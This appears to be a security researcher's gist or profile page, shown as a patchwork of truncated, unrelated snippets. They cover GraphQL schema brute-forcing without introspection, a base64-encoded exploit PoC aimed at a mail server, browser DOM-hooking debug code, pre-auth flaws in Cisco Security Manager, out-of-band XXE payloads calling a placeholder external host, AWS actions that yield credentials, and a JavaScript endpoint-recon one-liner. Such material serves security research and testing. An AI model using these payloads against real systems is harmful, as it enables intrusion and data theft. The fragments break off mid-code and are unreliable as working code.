pnigos

Playing with GraphQL when introspection is disabled

Quick write up on extracting a GraphQL schema when introspection is disabled. Bits and pieces sourced from various sources. Successfully tested on an Apollo instance.

TLDR: Some GraphQL instances provide name autocomplete suggestions. Some peeps have written tools to automate the extraction process. (ref https://youtu.be/nPB8o0cSnvM).

1. Bruteforce schema without introspection

First step is using a tool called clairvoyance by @nikitastupin (https://github.com/nikitastupin/clairvoyance). I found the main repo to lack error handling and support for additional features such as proxy.

pnigos

import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

pnigos

import sys

try:
  import re
  import base64
  from hashlib import sha256
  from binascii import hexlify, unhexlify
  from Crypto.Cipher import AES
  from xml.dom import minidom
  from pprint import pprint

pnigos

aW1wb3J0IHJlcXVlc3RzCmZyb20gdXJsbGliMy5leGNlcHRpb25zIGltcG9ydCBJbnNlY3VyZVJl
cXVlc3RXYXJuaW5nCmltcG9ydCByYW5kb20KaW1wb3J0IHN0cmluZwppbXBvcnQgc3lzCgoKZGVm
IGlkX2dlbmVyYXRvcihzaXplPTYsIGNoYXJzPXN0cmluZy5hc2NpaV9sb3dlcmNhc2UgKyBzdHJp
bmcuZGlnaXRzKToKICAgIHJldHVybiAnJy5qb2luKHJhbmRvbS5jaG9pY2UoY2hhcnMpIGZvciBf
IGluIHJhbmdlKHNpemUpKQoKaWYgbGVuKHN5cy5hcmd2KSA8IDI6CglwcmludCgiVXNhZ2U6IHB5
dGhvbiBQb0MucHkgPHRhcmdldD4gPGVtYWlsPiIpCglwcmludCgiRXhhbXBsZTogcHl0aG9uIFBv
Qy5weSBtYWlsLmV2aWwuY29ycCBoYXhvckBldmlsLmNvcnAiKQoJZXhpdCgpCnJlcXVlc3RzLnBh
Y2thZ2VzLnVybGxpYjMuZGlzYWJsZV93YXJuaW5ncyhjYXRlZ29yeT1JbnNlY3VyZVJlcXVlc3RX
YXJuaW5nKQp0YXJnZXQgPSBzeXMuYXJndlsxXQplbWFpbCA9IHN5cy5hcmd2WzJdCnJhbmRvbV9u
YW1lID0gaWRfZ2VuZXJhdG9yKDMpICsgIi5qcyIKdXNlcl9hZ2VudCA9ICJNb3ppbGxhLzUuMCAo

pnigos

var logger = console.trace;

// ELEMENT

;(getElementByIdCopy => {
  Element.prototype.getElementById = function(q) {
    logger('getElementById', q, this, this.innerHTML);
    return Reflect.apply(getElementByIdCopy, this, [q])
  }
})(Element.prototype.getElementById)

pnigos

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

pnigos

function debugAccess(obj, prop, debugGet){

    var origValue = obj[prop];

    Object.defineProperty(obj, prop, {
        get: function () {
            if ( debugGet )
                debugger;
            return origValue;
        },

pnigos

<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

pnigos

• chime:createapikey
• codepipeline:pollforjobs
• cognito-identity:getopenidtoken
• cognito-identity:getopenidtokenfordeveloperidentity
• cognito-identity:getcredentialsforidentity
• connect:getfederationtoken
• connect:getfederationtokens
• ecr:getauthorizationtoken
• [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_Re

pnigos

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt